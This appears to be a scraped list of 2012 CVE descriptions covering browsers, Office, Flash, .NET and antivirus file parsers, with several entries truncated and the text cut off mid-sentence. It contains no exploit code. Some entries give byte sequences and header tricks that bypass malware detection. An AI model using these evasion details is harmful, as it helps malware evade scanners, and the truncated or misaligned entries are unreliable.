drag-and-drop implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows user-assisted remote attackers to bypass intended file access restrictions via a crafted web site. [CVE-2012-2847] Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, does not request user confirmation before continuing a large series of downloads, which allows user-assisted remote attackers to cause a denial of service (resource consumption) via a crafted web site. [CVE-2012-2816] Google Chrome before 20.0.1132.43 on Windows does not properly isolate sandboxed processes, which might allow remote attackers to cause a denial of service (process interference) via unspecified vectors. [CVE-2012-2764] Untrusted search path vulnerability in Google Chrome before 20.0.1132.43 on Windows might allow local users to gain privileges via a Trojan horse Metro DLL in the current working directory. [CVE-2012-2557] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "cloneNode Use After Free Vulnerability." [CVE-2012-2552] Cross-site scripting (XSS) vulnerability in the SQL Server Report Manager in Microsoft SQL Server 2000 Reporting Services SP2 and SQL Server 2005 SP4, 2008 SP2 and SP3, 2008 R2 SP1, and 2012 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Reflected XSS Vulnerability." [CVE-2012-2550] Microsoft Works 9 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via a crafted Word .doc file, aka "Works Heap Vulnerability." [CVE-2012-2549] The IP-HTTPS server in Windows Server 2008 R2 and R2 SP1 and Server 2012 does not properly validate certificates, which allows remote attackers to bypass intended access restrictions via a revoked certificate, aka "Revoked Certificate Bypass Vulnerability." [CVE-2012-2548] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Layout Use After Free Vulnerability." [CVE-2012-2546] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Event Listener Use After Free Vulnerability." [CVE-2012-2543] Stack-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and 2010 SP1 [CVE-2012-2539] Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-2536] Cross-site scripting (XSS) vulnerability in Microsoft Systems Management Server 2003 SP3 and System Center Configuration Manager 2007 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Reflected XSS Vulnerability." [CVE-2012-2532] Microsoft FTP Service 7.0 and 7.5 for Internet Information Services (IIS) processes unspecified commands before TLS is enabled for a session, which allows remote attackers to obtain sensitive information by reading the replies to these commands, aka "FTP Command Injection Vulnerability." [CVE-2012-2531] Microsoft Internet Information Services (IIS) 7.5 uses weak permissions for the Operational log, which allows local users to discover credentials by reading this file, aka "Password Disclosure Vulnerability." [CVE-2012-2528] Use-after-free vulnerability in Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-2524] Microsoft Office 2007 SP2 and SP3 and 2010 SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Computer Graphics Metafile (CGM) file, aka "CGM File Format Memory Corruption Vulnerability." [CVE-2012-2523] Integer overflow in Microsoft Internet Explorer 8 and 9, JScript 5.8, and VBScript 5.8 on 64-bit platforms allows remote attackers to execute arbitrary code by leveraging an incorrect size calculation during object copying, aka "JavaScript Integer Overflow Remote Code Execution Vulnerability." [CVE-2012-2522] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a malformed virtual function table after this table's deletion, aka "Virtual Function Table Corruption Remote Code Execution Vulnerability." [CVE-2012-2521] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Asynchronous NULL Object Access Remote Code Execution Vulnerability." [CVE-2012-2519] Untrusted search path vulnerability in Entity Framework in ADO.NET in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, and 4 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .NET application, aka ".NET Framework Insecure Library Loading Vulnerability." [CVE-2012-2493] The VPN downloader implementation in the WebLaunch feature in Cisco AnyConnect Secure Mobility Client 2.x before 2.5 MR6 on Windows, and 2.x before 2.5 MR6 and 3.x before 3.0 MR8 on Mac OS X and Linux, does not properly validate binaries that are received by the downloader process, which allows remote attackers to execute arbitrary code via vectors involving (1) ActiveX or (2) Java components, aka Bug ID CSCtw47523. [CVE-2012-2376] Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and earlier on Windows allows remote attackers to execute arbitrary code via crafted arguments that trigger incorrect handling of COM object VARIANT types, as exploited in the wild in May 2012. [CVE-2012-2290] The client in EMC NetWorker Module for Microsoft Applications (NMM) 2.2.1, 2.3 before build 122, and 2.4 before build 375 allows remote attackers to execute arbitrary code by sending a crafted message over a TCP communication channel. [CVE-2012-2287] The authentication functionality in EMC RSA Authentication Agent 7.1 and RSA Authentication Client 3.5 on Windows XP and Windows Server 2003, when an unspecified configuration exists, allows remote authenticated users to bypass an intended token-authentication step, and establish a login session to a remote host, by leveraging Windows credentials for that host. [CVE-2012-2284] The (1) install and (2) upgrade processes in EMC NetWorker Module for Microsoft Applications (NMM) 2.2.1, 2.3 before build 122, and 2.4 before build 375, when Exchange Server is used, allow local users to read cleartext administrator credentials via unspecified vectors. [CVE-2012-2273] Comodo Internet Security before 5.10.228257.2253 on Windows 7 x64 allows local users to cause a denial of service (system crash) via a crafted 32-bit Portable Executable (PE) file with a kernel ImageBase value. [CVE-2012-2051] Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-4147, CVE-2012-4148, CVE-2012-4149, CVE-2012-4150, CVE-2012-4151, CVE-2012-4152, CVE-2012-4153, CVE-2012-4154, CVE-2012-4155, CVE-2012-4156, CVE-2012-4157, CVE-2012-4158, CVE-2012-4159, and CVE-2012-4160. [CVE-2012-2050] Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-2049] Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-2040] Untrusted search path vulnerability in the installer in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2039] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2038] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2037] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2036] Integer overflow in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2035] Stack-based buffer overflow in Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2034] Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X [CVE-2012-2006] Unspecified vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to modify data or cause a denial of service via unknown vectors. [CVE-2012-2005] Cross-site scripting (XSS) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-2004] Open redirect vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-2003] Cross-site request forgery (CSRF) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. [CVE-2012-1943] Untrusted search path vulnerability in Updater.exe in the Windows Updater Service in Mozilla Firefox 12.0, Thunderbird 12.0, and SeaMonkey 2.9 on Windows allows local users to gain privileges via a Trojan horse wsock32.dll file in an application directory. [CVE-2012-1942] The Mozilla Updater and Windows Updater Service in Mozilla Firefox 12.0, Thunderbird 12.0, and SeaMonkey 2.9 on Windows allow local users to gain privileges by loading a DLL file in a privileged context. [CVE-2012-1925] Opera before 11.62 does not ensure that a dialog window is placed on top of content windows, which makes it easier for user-assisted remote attackers to trick users into downloading and executing arbitrary files via a download dialog located under other windows. [CVE-2012-1896] Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly consider trust levels during construction of output data, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "Code Access Security Info Disclosure Vulnerability." [CVE-2012-1895] The reflection implementation in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5.1, and 4 does not properly enforce object permissions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "Reflection Bypass Vulnerability." [CVE-2012-1894] Microsoft Office for Mac 2011 uses world-writable permissions for the "Applications/Microsoft Office 2011/" directory and certain other directories, which allows local users to gain privileges by placing a Trojan horse executable file in one of these directories, aka "Office for Mac Improper Folder Permissions Vulnerability." [CVE-2012-1892] Cross-site scripting (XSS) vulnerability in Microsoft Visual Studio Team Foundation Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "XSS Vulnerability." [CVE-2012-1889] Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site. [CVE-2012-1888] Buffer overflow in Microsoft Visio 2010 SP1 and Visio Viewer 2010 SP1 allows remote attackers to execute arbitrary code via a crafted Visio file, aka "Visio DXF File Format Buffer Overflow Vulnerability." [CVE-2012-1887] Use-after-free vulnerability in Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1, and Office 2008 and 2011 for Mac, allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel SST Invalid Length Use After Free Vulnerability." [CVE-2012-1886] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-1885] Heap-based buffer overflow in Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-1882] Microsoft Internet Explorer 6 through 9 does not block cross-domain scrolling events, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Scrolling Events Information Disclosure Vulnerability." [CVE-2012-1881] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnRowsInserted Event Remote Code Execution Vulnerability." [CVE-2012-1880] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "insertRow Remote Code Execution Vulnerability." [CVE-2012-1879] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access an undefined memory location, aka "insertAdjacentText Remote Code Execution Vulnerability." [CVE-2012-1878] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "OnBeforeDeactivate Event Remote Code Execution Vulnerability." [CVE-2012-1877] Microsoft Internet Explorer 6 through 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Title Element Change Remote Code Execution Vulnerability." [CVE-2012-1876] Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka "Col Element Remote Code Execution Vulnerability," as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012. [CVE-2012-1875] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Same ID Property Remote Code Execution Vulnerability." [CVE-2012-1874] Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows user-assisted remote attackers to execute arbitrary code by accessing a deleted object, aka "Developer Toolbar Remote Code Execution Vulnerability." [CVE-2012-1873] Microsoft Internet Explorer 7 through 9 does not properly create and initialize string data, which allows remote attackers to obtain sensitive information from process memory via a crafted HTML document, aka "Null Byte Information Disclosure Vulnerability." [CVE-2012-1872] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to inject arbitrary web script or HTML via crafted character sequences with EUC-JP encoding, aka "EUC-JP Character Encoding Vulnerability." [CVE-2012-1862] Open redirect vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "SharePoint URL Redirection Vulnerability." [CVE-2012-1861] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Script in Username Vulnerability." [CVE-2012-1860] Microsoft Office SharePoint Server 2007 SP2 and SP3, SharePoint Server 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 do not properly check permissions for search scopes, which allows remote authenticated users to obtain sensitive information or cause a denial of service (data modification) by changing a parameter in a search-scope URL, aka "SharePoint Search Scope Vulnerability." [CVE-2012-1859] Cross-site scripting (XSS) vulnerability in scriptresx.ashx in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "XSS scriptresx.ashx Vulnerability." [CVE-2012-1858] The toStaticHTML API (aka the SafeHTML component) in Microsoft Internet Explorer 8 and 9, Communicator 2007 R2, and Lync 2010 and 2010 Attendee does not properly handle event attributes and script, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted HTML document, aka "HTML Sanitization Vulnerability." [CVE-2012-1857] Cross-site scripting (XSS) vulnerability in the Enterprise Portal component in Microsoft Dynamics AX 2012 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka "Dynamics AX Enterprise Portal XSS Vulnerability." [CVE-2012-1856] The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka "MSCOMCTL.OCX RCE Vulnerability." [CVE-2012-1855] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly handle function pointers, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Memory Access Vulnerability." [CVE-2012-1854] Untrusted search path vulnerability in VBE6.dll in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-1849] Untrusted search path vulnerability in Microsoft Lync 2010, 2010 Attendee, and 2010 Attendant allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .ocsmeet file, aka "Lync Insecure Library Loading Vulnerability." [CVE-2012-1847] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-1821] The Network Threat Protection module in the Manager component in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.700x on Windows Server 2003 allows remote attackers to cause a denial of service (web-server outage, or daemon crash or hang) via a flood of packets that triggers automated blocking of network traffic. [CVE-2012-1747] Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Windows, allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2012-1746. [CVE-2012-1746] Unspecified vulnerability in the Network Layer component in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3, when running on Windows, allows remote attackers to affect availability via unknown vectors, a different vulnerability than CVE-2012-1747. [CVE-2012-1662] CA ARCserve Backup r12.0 through SP2, r12.5 before SP2, r15 through SP1, and r16 before SP1 on Windows allows remote attackers to cause a denial of service (service shutdown) via a crafted network request. [CVE-2012-1620] slock 0.9 does not properly handle the XRaiseWindow event when the screen is locked, which might allow physically proximate attackers to obtain sensitive information by pressing a button, which reveals the desktop and active windows. [CVE-2012-1545] Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, allows remote attackers to bypass Protected Mode or cause a denial of service (memory corruption) by leveraging access to a Low integrity process, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012. [CVE-2012-1539] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CTreePos Use After Free Vulnerability." [CVE-2012-1538] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site, aka "CFormElement Use After Free Vulnerability." [CVE-2012-1535] Unspecified vulnerability in Adobe Flash Player before 11.3.300.271 on Windows and Mac OS X and before 11.2.202.238 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted SWF content, as exploited in the wild in August 2012 with SWF content in a Word document. [CVE-2012-1529] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to an object that (1) was not properly initialized or (2) is deleted, aka "OnMove Use After Free Vulnerability." [CVE-2012-1526] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not initialized or (2) is deleted, aka "Layout Memory Corruption Vulnerability." [CVE-2012-1525] Heap-based buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.2 and 10.x before 10.1.4 on Windows and Mac OS X allows attackers to execute arbitrary code via unspecified vectors. [CVE-2012-1524] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Attribute Remove Remote Code Execution Vulnerability." [CVE-2012-1523] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Center Element Remote Code Execution Vulnerability." [CVE-2012-1522] Microsoft Internet Explorer 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing a deleted object, aka "Cached Object Remote Code Execution Vulnerability." [CVE-2012-1459] The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1458] The Microsoft CHM file parser in ClamAV 0.96.4 and Sophos Anti-Virus 4.61.0 allows remote attackers to bypass malware detection via a crafted reset interval in the LZXC header of a CHM file. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CHM parser implementations. [CVE-2012-1457] The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-1453] The CAB file parser in Dr.Web 5.0.2.03300, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Sophos Anti-Virus 4.61.0, Trend Micro AntiVirus 9.120.0.1004, McAfee Gateway (formerly Webwasher) 2010.1C, Emsisoft Anti-Malware 5.1.0.1, CA eTrust Vet Antivirus 36.1.8511, Antiy Labs AVL SDK 2.0.3.7, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Rising Antivirus 22.83.00.03, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Fortinet Antivirus 4.2.254.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via a CAB file with a modified coffFiles field. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different CAB parser implementations. [CVE-2012-1443] The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. [CVE-2012-1441] The Microsoft EXE file parser in eSafe 7.0.17.0 and Prevx 3.0 allows remote attackers to bypass malware detection via an EXE file with a modified value in any of several e_ fields. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1438] The Microsoft Office file parser in Comodo Antivirus 7425 and Sophos Anti-Virus 4.61.0 allows remote attackers to bypass malware detection via an Office file with a ustar character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different Office parser implementations. [CVE-2012-1437] The Microsoft Office file parser in Comodo Antivirus 7425 allows remote attackers to bypass malware detection via an Office file with a \50\4B\53\70\58 character sequence at a certain location. [CVE-2012-1436] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \2D\6C\68 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1435] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \50\4B\4C\49\54\45 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1434] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \19\04\00\10 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1433] The Microsoft EXE file parser in AhnLab V3 Internet Security 2011.01.18.00, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \4a\46\49\46 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1432] The Microsoft EXE file parser in Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, and Panda Antivirus 10.0.2.7 allows remote attackers to bypass malware detection via an EXE file with a \57\69\6E\5A\69\70 character sequence at a certain location. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different EXE parser implementations. [CVE-2012-1420] The TAR file parser in Quick Heal (aka Cat QuickHeal) 11.00, Command Antivirus 5.2.11.5, F-Prot Antivirus 4.6.2.117, Fortinet Antivirus 4.2.254.0, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, Panda Antivirus 10.0.2.7, and Rising Antivirus 22.83.00.03 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \7fELF character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [CVE-2012-0779] Adobe Flash Player before 10.3.183.19 and 11.x before 11.2.202.235 on Windows, Mac OS X, and Linux [CVE-2012-0773] The NetStream class in Adobe Flash Player before 10.3.183.18 and 11.x before 11.2.202.228 on Windows, Mac OS X, and Linux [CVE-2012-0772] An unspecified ActiveX control in Adobe Flash Player before 10.3.183.18 and 11.x before 11.2.202.228, and AIR before 3.2.0.2070, on Windows does not properly perform URL security domain checking, which allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors. [CVE-2012-0769] Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0768] The Matrix3D component in Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0767] Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0756] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0755] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0754] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0753] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0752] Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris [CVE-2012-0751] The 